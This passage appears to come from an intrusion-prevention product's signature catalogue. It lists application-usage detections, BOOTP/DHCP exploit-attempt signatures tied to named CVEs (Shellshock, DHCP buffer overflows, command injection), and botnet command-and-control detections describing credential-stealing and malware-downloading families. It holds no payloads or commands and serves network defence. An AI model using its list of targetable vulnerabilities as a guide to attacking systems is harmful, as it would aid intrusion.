Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bond International Software, Inc. develops recruiting software and staffing software solutions that empower staffing and recruiting firms of any size to improve their growth and profitability.
Back to top

Bonjour

About this situation: Endpoint Context Agent based Apple Bonjour
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-994-5242
Description: Bonjour endpoint application has been detected. Bonjour is a local network discovery protocol used by Apple.
Back to top

bonpoo

About this situation: bonpoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-628-5211
Description: bonpoo is a web-based file hosting service, which lets a user upload files and email them to his/her friends. The recipient will receive an email with a URL to download the uploaded file.
Back to top

Bontq

About this situation: Bontq usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Bug tracking system which enables users to monitor and develop their projects in an efficient and well organized manner.
Back to top

BookedIN

About this situation: Application BookedIN detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BookedIN - manage Your Schedules, Automate your appointment booking process. Add your services, adjust pricing and availability, then watch your calendar fill up
Back to top

Bookeo

About this situation: Application Bookeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bookeo is a scheduling and reservation system for businesses.
Back to top

Booker

About this situation: Application Booker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Booker offers advanced software for Management, Booking, Marketing, and POS for small, medium, and large size business worldwide.
Back to top

Bookfresh

About this situation: Bookfresh usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: This service allows users to schedule and manage appointments online.
Back to top

Booking-Manager

About this situation: Application Booking-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Booking Manager is a yacht charter software and online booking system for charter operators and agencies.
Back to top

Booking.com

About this situation: Booking.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: Booking.com is an online travel agency, providing a platform for booking accommodations.
Back to top

BookingBug

About this situation: Application BookingBug detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BookingBug is a scheduling and appointment system that enables organisations to market and sell services through channels.
Back to top

Boomerang-for-Gmail

About this situation: Application Boomerang-for-Gmail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boomerang is a provider of email productivity software that empowers people to focus on what matters on the worlds top email platforms.
Back to top

Boomi

About this situation: Application Boomi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dell Boomi is provider of cloud integration technology and the creator of AtomSphere, the industry's first and leading integration platform-as-a-service.
Back to top

Boomr-Mobile

About this situation: Application Boomr-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boomr Mobile - time clock solution for smartphones. Securely check-in to geo-tagged locations, update to-do lists, and upload screenshots.
Back to top

BOOTP_CS-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in bash detected
Context: BOOTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

BOOTP_CS-BOOTP-Daemon-Filename-Not-Terminated

About this situation: No null terminator in BOOTP filename detected
Context: BOOTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, bootpd, Unix not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Description:
Back to top

BOOTP_CS-BOOTP-Daemon-Long-Filename-BOF

About this situation: A buffer overflow attempt in BOOTP filename detected
Context: BOOTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, bootpd, CVE1999, Unix not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: BOOTP-Daemon-Long-Filename-BOF
Description:
Back to top

BOOTP_CS-Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in BusyBox Project BusyBox detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BusyBox, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read
Description:
Back to top

BOOTP_CS-DHCP-BOOTREQUEST-Message

About this situation: A DHCP BOOTREQUEST message detected
Context: BOOTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information
First detected in: sgpkg-ips-1713-5242
Last changed: sgpkg-ips-1713-5242
Description:
Back to top

BOOTP_CS-Dhcpd-Packet-Size-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in dhcpcd detected
Context: BOOTP Client Stream
Severity: 10
Tags: Debian GNU/Linux, SUSE Linux Enterprise Server 11, Any Hardware, Dhcpcd, CVE2012, Debian GNU/Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Dhcpcd-Packet-Size-Stack-Buffer-Overflow
Description:
Back to top

BOOTP_CS-FreeBSD-Bootpd-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeBSD Project bootpd detected
Context: BOOTP Client Stream
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2018, FreeBSD not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: FreeBSD-Bootpd-Stack-Buffer-Overflow
Description:
Back to top

BOOTP_CS-FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in FreeRADIUS Server Project FreeRADIUS detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FreeRADIUS, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read
Description:
Back to top

BOOTP_CS-ISC-DHCP-Buffer-Overflow

About this situation: An ISC DHCP Buffer Overflow vulnerability
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2004, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: ISC-DHCP-Buffer-Overflow
Description:
Back to top

BOOTP_CS-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection

About this situation: A vulnerability in ISC DHCP dhclient
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP dhclient, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
Description:
Back to top

BOOTP_CS-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow

About this situation: Buffer overflow attack against ISC DHCP dhclient detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP dhclient, CVE2009, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1005-5242
Vulnerability: DHCP-ISC-DHCP-dhclient-script_write_params-Buffer-Overflow
Description:
Back to top

BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Internet Software Consortium DHCP detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2006, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
Description:
Back to top

BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in Internet Software Consortium DHCP detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2006, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
Description:
Back to top

BOOTP_CS-Isc-DHCP-Server-Packet-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC DHCP Server detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-408-4219
Vulnerability: Isc-DHCP-Server-Packet-Processing-Denial-Of-Service
Description:
Back to top

BOOTP_CS-Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC DHCP Server detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2010, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-02, CVE2025, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows' DHCP client
Context: BOOTP Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-07, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Server-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Microsoft-Windows-DHCP-Server-Remote-Code-Execution
Description:
Back to top

BOOTP_CS-Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626

About this situation: An attempt to exploit a vulnerability in Microsoft Windows DHCP Server detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Generic dhcp server, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626
Description:
Back to top

BOOTP_CS-Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow

About this situation: A DHCP Buffer Overflow vulnerability
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2009, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow
Description:
Back to top

BOOTP_CS-Red-Hat-Networkmanager-DHCP-Command-Injection

About this situation: An attempt to exploit a vulnerability in Red Hat RPM resource detected
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat RPM resource, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1072-5242
Vulnerability: Red-Hat-Networkmanager-DHCP-Command-Injection
Description:
Back to top

BOOTP_CS-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution

About this situation: An attempt to exploit a vulnerability in Sun Solaris detected
Context: BOOTP Client Stream
Severity: 7
Tags: Solaris, Any Hardware, CVE2005, Solaris not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
Description:
Back to top

BOOTP_CS-Sun-Solaris-in.dhcpd-Malformed-Packet

About this situation: A buffer overflow attempt in dhcpd detected
Context: BOOTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, bootpd, Unix not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: BOOTP-Sun-Solaris-in.dhcpd-Malformed-Packet
Description:
Back to top

BOOTP_CS-Suspicious-Request

About this situation: An attempt to exploit a vulnerability in a DHCP Server
Context: BOOTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

BOOTP_CS-Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148

About this situation: An attempt to exploit a vulnerability in Windows ICS DHCP server detected
Context: BOOTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-09, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Vulnerability: Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148
Description:
Back to top

BOOTP_Daemon-Hardware-Address-Length-Overflow

About this situation: Buffer overflow in bootp daemon
Context: BOOTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, bootpd, CVE1999, Unix not specific, Potential Denial of Service
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: MISC-BOOTP-Hardware-Address-Length-Overflow
Description:
Back to top

BOOTP_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: BOOTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

BOOTP_SS-Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: BOOTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1127-5242
Vulnerability: Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution
Description:
Back to top

BOOTP_SS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: BOOTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
Description:
Back to top

BOOTP_SS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows' DHCP client
Context: BOOTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2006-07, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Description:
Back to top

Booz-Allen-Hamilton

About this situation: Application Booz-Allen-Hamilton detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Booz Allen Hamilton provides services to government agencies in the defense, security, and civil sectors, as well as to corporations, institutions, and not-for-profit organizations. The company provides services in strategy, operations, organization and change, information technology, systems engineering, and program management.
Back to top

Boscorporate

About this situation: Application Boscorporate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: B.O.S. Better Online Solutions Ltd.
Back to top

Boston-Mutual-Life-Insurance

About this situation: Application Boston-Mutual-Life-Insurance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Boston Mutual is dedicated to maintaining high quality products by providing innovative benefits specially designed to meet our clients cost objectives and their employees needs.
Back to top

Botnet-CnC-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Botnet-Command-And-Control
Description: A message has been flagged as probable botnet command and control message. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Fareit-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Botnet-Fareit
Description: Fareit is a malicious botnet. Most notably, Fareit engages in trojan activity and attempts to steal credentials, such as usernames and passwords for online service accounts. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Ghost-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Botnet-Ghost
Description: Ghost is a malicious botnet which is a serious threat to Internet users. Most notably, Ghost engages in trojan activity and allows remote backdoor access to infected computers. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Kuluoz-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: Botnet-Kuluoz
Description: Kuluoz is a malicious botnet which is a serious threat to Internet users. Most notably, Kuluoz engages in trojan activity and downloads various malicious modules including spam sending software and information stealing components. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Nitol-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Nitol
Description: Nitol is a malicious botnet. The main focus of Nitol's monetization consists in so-called distributed denial of service (DDoS) attacks. However, Nitol exhibits a flexible monetization scheme which allows to download and execute arbitrary other malicious modules. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Palevo-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Palevo
Description: Palevo is a malicious botnet with a malware download component. Palevo has been observed to download malicious executables such as spambots, banking trojans or other malware downloaders. As such, users of infected PCs should not only delete Palevo, but should also make sure no other malware is running on the infected PC. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Pramro-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Botnet-Pramro
Description: Pramro is a malicious botnet that is often dropped by other botnets. Pramro-infected computers are thus likely to be also infected with other types of malicious bots. Pramro becomes part of a malicious proxy network and infected computers will proxy malicious web traffic. Pramro is a self-maintaining network and infected PCs thus try to reach out to other infected PCs to verify their availability. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Pushdo-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Botnet-Pushdo
Description: Pushdo is a malicious botnet. Pushdo is a malware family that specializes in the distribution and download of arbitrary malicious modules. In particular, Pushdo downloads and installs a spam bot on infected computers. As such, infected computers are abused to send unsolicited bulk email. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Ramnit-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Ramnit
Description: Ramnit is a malicious botnet that infects executable files on Windows computers and file shares. Ramnit has been observed to snoop on web sessions of infected computers. With this ability, Ramnit can be used to steal login credentials, such as for online services or online banking. As such, users of infected PCs should immediately change their passwords in online services (social networks, web mailers, banks, etc.). Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Sality_NonP2P-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Sality_NonP2P
Description: Sality Non-P2P is a malicious botnet coupled with a component that infects executable files on Windows computer (and file shares). Sality Non-P2P is a malware dropper and has been observed to download malicious executables to proxy web traffic, perform click fraud, or send spam emails. However, Sality Non-P2P may download any other arbitrary malicious executable at any time and imposes a high security risk. Sality Non-P2P bots organize in centralized botnets and communicate over HTTP. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Sality_P2P-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Botnet-Sality_P2P
Description: Sality P2P is a malicious botnet coupled with a component that infects executable files on Windows computers and file shares. Sality P2P is a malware dropper and has been observed to download malicious executables to proxy web traffic, perform click fraud, or send spam emails. However, Sality P2P may download any arbitrary malicious executable at any time and imposes a high security risk. Sality P2P bots organize in a peer-to-peer botnet, which are highly resilient due to the lack of single-point-of-failures. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Smokeloader-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Botnet-Smokeloader
Description: Smokeloader is a malicious botnet which is a serious threat to Internet users. Most notably, Smokeloader engages in trojan activity and downloads various malicious modules including spam sending software, information stealing components and ransomware. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Tofsee-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Tofsee
Description: Tofsee is a malicious botnet. Infected computers are massively abused to send spam emails. Tofsee fetches spam templates via HTTP and contacts an excessively high number of mail servers. Such spam bots may cause that the delivery of legitimate emails is hindered as the infected computer's network becomes blocked by email recipients and/or origin organizations may be discredited as spam distributors. Risk analysis: Risk level is high. Attack Host: $([[$LN_DST]]/ipv4) Target Host: $([[$LN_SRC]]/ipv4) Target Port: $([[$LN_SPORT]])
Back to top

Botnet-Virut-Traffic-Detected

About this situation: Probable botnet command and control message was detected
Context: Botnet CnC without parameters
Severity: 8
Tags: Botnet
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Vulnerability: Botnet-Virut
